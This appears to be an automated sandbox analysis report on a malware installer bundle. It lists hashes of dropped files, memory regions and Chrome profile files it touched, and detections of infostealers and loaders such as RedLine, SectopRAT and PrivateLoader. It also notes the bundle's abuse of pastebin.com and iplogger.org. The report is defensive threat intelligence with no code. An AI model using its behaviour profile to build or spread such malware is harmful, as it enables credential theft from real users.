SHA512 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe

MD5 1902e1df4ecf3bf7bcfc0c53b992cd24
SHA1 a0c9cde0b2113466a820fa6ebcccfdcd93b26b97
SHA256 c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720
SHA512 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe

MD5 7d44a083f0e81baf1ecb264b93bdc9a5
SHA1 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe

MD5 8aaec68031b771b85d39f2a00030a906
SHA1 7510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256 dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA512 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe

MD5 06ee576f9fdc477c6a91f27e56339792
SHA1 4302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512 e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe

MD5 37a1c118196892aa451573a142ea05d5
SHA1 4144c1a571a585fef847da516be8d89da4c8771e
SHA256 a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a
SHA512 aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

memory/4900-103-0x00000000061F0000-0x000000000623C000-memory.dmp

memory/4900-102-0x00000000061A0000-0x00000000061BE000-memory.dmp

memory/4604-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4604-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4604-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2672-135-0x0000000000E60000-0x0000000000E68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2776-145-0x0000000004B70000-0x0000000004BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-LFQQP.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2776-155-0x0000000004B50000-0x0000000004B6E000-memory.dmp

memory/2776-144-0x0000000000470000-0x00000000004E2000-memory.dmp

memory/3636-141-0x0000000002330000-0x0000000002336000-memory.dmp

memory/3636-132-0x00000000001E0000-0x00000000001F8000-memory.dmp

memory/208-130-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2776-156-0x00000000053C0000-0x0000000005964000-memory.dmp

memory/1084-161-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4256-167-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/208-168-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4900-180-0x0000000006790000-0x00000000067AE000-memory.dmp

memory/4952-183-0x0000000003710000-0x0000000003732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PATC0.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4900-182-0x0000000007440000-0x00000000074E3000-memory.dmp

memory/4952-181-0x0000000003480000-0x00000000034A4000-memory.dmp

memory/4900-170-0x00000000704D0000-0x000000007051C000-memory.dmp

memory/4900-169-0x0000000006750000-0x0000000006782000-memory.dmp

memory/4900-193-0x0000000007B70000-0x00000000081EA000-memory.dmp

memory/4952-195-0x0000000006250000-0x0000000006868000-memory.dmp

memory/4952-197-0x00000000068F0000-0x00000000069FA000-memory.dmp

memory/4952-198-0x0000000006A00000-0x0000000006A3C000-memory.dmp

memory/4604-208-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4604-207-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4604-206-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-205-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4604-202-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4604-199-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4952-196-0x00000000068D0000-0x00000000068E2000-memory.dmp

memory/4900-194-0x0000000007210000-0x000000000722A000-memory.dmp

memory/4900-209-0x0000000007550000-0x000000000755A000-memory.dmp

memory/4900-213-0x0000000007740000-0x00000000077D6000-memory.dmp

memory/4900-221-0x00000000076D0000-0x00000000076E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fri20fbc038b0b02ea.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4984-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4568-232-0x0000000000400000-0x00000000016BC000-memory.dmp

memory/4900-233-0x0000000007720000-0x000000000772E000-memory.dmp

memory/4900-234-0x00000000077E0000-0x00000000077F4000-memory.dmp

memory/4900-235-0x0000000007820000-0x000000000783A000-memory.dmp

memory/4900-236-0x0000000007810000-0x0000000007818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\NuWKoG5w.G

MD5 4d073e6b58b793121a7d814201c17aa8
SHA1 924c01c515cdfb2c89948519113db84f272fb1b8
SHA256 b36d1359231ad7ad5d9bbcb908e2547c50d6bc724ac1e0b4a1da315752823a06
SHA512 4ea6a32bc7c23398e72108e3fe22475eb541777defdebf541f8a1b0a20a79891b8d8b9bb361affd14488d5f9d42f8eb949c0e385958da9b203839440813c3cd1

C:\Users\Admin\AppData\Local\Temp\pajqyzJ.o

MD5 394f820f75a9a6164a0ceff2db6037a1
SHA1 5843110d8ce5e27f0f3d7781151891bff9131664
SHA256 31a92c9d65ee868ca0b23ee616a590f3cd4ac22aef1846f33eda8abac4e8d007
SHA512 48ce7ee8114e126aa3f679f465bef64d062c88365607b1afe87cbb2faed88ec88109a2edcd610a72b937172d60668208cdf66fbfce640ffe25547294d1884b44

memory/4212-282-0x0000000000400000-0x00000000016D5000-memory.dmp

memory/4952-283-0x0000000000400000-0x00000000016E0000-memory.dmp

memory/4836-291-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1084-290-0x0000000000400000-0x0000000000414000-memory.dmp

memory/372-296-0x00000000031F0000-0x0000000003295000-memory.dmp

memory/372-300-0x00000000032A0000-0x0000000003332000-memory.dmp

memory/372-297-0x00000000032A0000-0x0000000003332000-memory.dmp

memory/2120-301-0x00000000033B0000-0x0000000003458000-memory.dmp

memory/2120-302-0x0000000003460000-0x00000000034F5000-memory.dmp

memory/2120-305-0x0000000003460000-0x00000000034F5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/372-311-0x0000000000400000-0x000000000054C000-memory.dmp

memory/2120-312-0x0000000000400000-0x0000000000629000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 c7c64b0aba4e28fc1d19b1b3946656e5
SHA1 afa03f1afe3b76218c3168db01df9fca215ae479
SHA256 027fd946bc166f858df84bf63ebd0849eaeb90e0d253068479feec73a86b2e49
SHA512 285146a880982803e158a89035aea1f10348c52ad2b793123be1a415a632ef267d9edc604fc3cc0ffd3b88e5ed3b494a1139ff1be4f0a239d05ec7e1b6a4e014

memory/4212-328-0x0000000000400000-0x00000000016D5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 9e34422f9c8265667ca6ca3d2c42d309
SHA1 3aa07dbe2841a2581f924b396fa33d16d0ea3418
SHA256 017867bd13deba49bce68be6ce49eb569bbe7ab64d6e89f791a6726afc0468e9
SHA512 76e841e084d94ecab8a485518e08c53a4e1ce706bb0a4a68d8e7b33844a264d746b6d581802e14d006830881bde7eaa0548124f9287b57611f80839367263401

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d9f690c37b23c1b814e8680fb6b38399
SHA1 61add990d379b5ca69ced3de467a235d443e5d53
SHA256 2d2206128bda01cc595dba614d7bf474e0ef94e2212c540bac28d003818e7a64
SHA512 73fefdc16b605b55932983324acc5fa8ff7d279561a63a3f83c9766cc3e1a10cf0a3780b8c42c7f28e5e3aa34d16a6031dc739e2e24184e4b5cd5a3320df3ac2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 76abc17f0bcde2c84ab37dbc56be647d
SHA1 d20e2d96957428fe8a8ea8ee8abf8711c562571b
SHA256 14b78bd9d9c2cc2329e8b05012e6fa074a0aa093c67ec01a45f74576c1fb20c3
SHA512 8149da4a8a5f3303337d6f624adae472c874b3a0f59267df003fbdd2d2e7bd11a55900f4d75cd2de25d0f1f0232127d88ab6817368faa7c512d9510be8a219e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 72122163c28c1c1cac772d3607627d4f
SHA1 471c61343a2ede860cc2c1d758d637e3e8421712
SHA256 8a174015857b64d77564a9d42d8d74b6b0363e5cad4b3f734100fbb349ba6675
SHA512 382d3620f6fd997c5556702e3fdec04f7ccf86f2fa77c85da9d0acafa945de5ede70e537789b61314d0dc58aa360cef2178bb706ffe92cb59cc39efede394ef1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 83f8f491d5d35969b8206dea572b7a1d
SHA1 e4eaf6154c071850f0dbf29ea7d37b45e705c4ea
SHA256 eb0eb2b6eed9ea622af864d3550030ffee646ce3a7aad564af00a5230ce88845
SHA512 a21f568a86ad3b485599ebb8cbd6ad8a26223cdb6ee13bb17b78de4d31586df1845285bdc7dd18700550a8e72568487af68404033307f7429811db147b2474e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 14a93595e828530a1f7d7f1fd010105c
SHA1 a2071864fe4a2c3b918be8766d40f574a23ff46d
SHA256 94b248bb81e1035d32b54b1ebdc1d02e2e3fea0fca2c786c5f95dca0f6c350e8
SHA512 4c0dc70898c5c7e9d3f558e093a7b237d3724f32a7afb75691ed373ec27928f61be9a63717e6140062ccecc6339bfdbf18586b4ee45b93203abf3608ffc23e99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9aa8a12d7d9f0bb33508cd5fa94206cb
SHA1 f289f40ae63f1068933a38919fee8b0f1cbf2409
SHA256 19c2f8b477b0b9893c73996d1faf0cab6eab6a09ecf2ffc83fb9047218e72836
SHA512 c09cd129073be5049bb6b2aaa460315441ef3c4a1cbe41dcd5063e6c1abfeecb19ef4bb0a355e0324e7763135f33f5bfd4d04a5a73754fd98d121a1dcec8b329

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 981d9a31d9e3938565495e6fb20bb2e6
SHA1 92a5c56f9f8e63d6df68981ed12df725f37ecb5e
SHA256 c066d94e421ba4a559f6b645a0659cb8c4f3b5df6232adde030a50affd3a347d
SHA512 0e3353d433bb7f16a9d62930018ac57c09e433bc187d4e3705b2d84845b5ae58859b6b0ce08a437e58b5e1514b123b1be2db01c480354b8df70c38dd40c021a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 df347779f16bf23a871ed250540a4a8b
SHA1 d59e42d6515eeec4b35cb96953e799d47d4ca7dc
SHA256 0c927db30119f4afed5dab73069fa47836dd76b4e6e0efb99b5677c1dbbf562a
SHA512 87a890601fb37c443bad6bbf88d597463cd10d2a78a636a805c389b72f122b94a9d5052a2acb1e8e035accfe1914f8a80126c7420218efe22e67c42b7eee4a04

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 92a83667a2fd3edfbef91e5e8a3432c8
SHA1 ed07ebbd410f6b393498342bb1311e3a9fd1ccef
SHA256 becb484c72261cc0f3b631e57d35870ecee4e430ec9518cd3aa017a09074b1bd
SHA512 92e0e303175099bf438b944517f925a47176fe70f7a360093ae68895bc57d18d32dbcd18560da3675298023106d21890383eda2653315a4cd15c2d127b49b435

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 08ed2ee12303e1f2a6e941e8a08438f2
SHA1 f8f3ae4c185fcd2f242165910d34ec0c08f05158
SHA256 9fbff9fdaa2cfedcc7e36f7985303d3b3f413dff25d28fba41f654baa2382697
SHA512 2507779244c20a95744ed96763f64279406c61271e5d212d30e21c9c7d8fe5f7672de80197267047cdd6b44de8fc1fe98441241af47ddfe20a9f20260136afca

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win7-20240708-en

Max time kernel

4s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
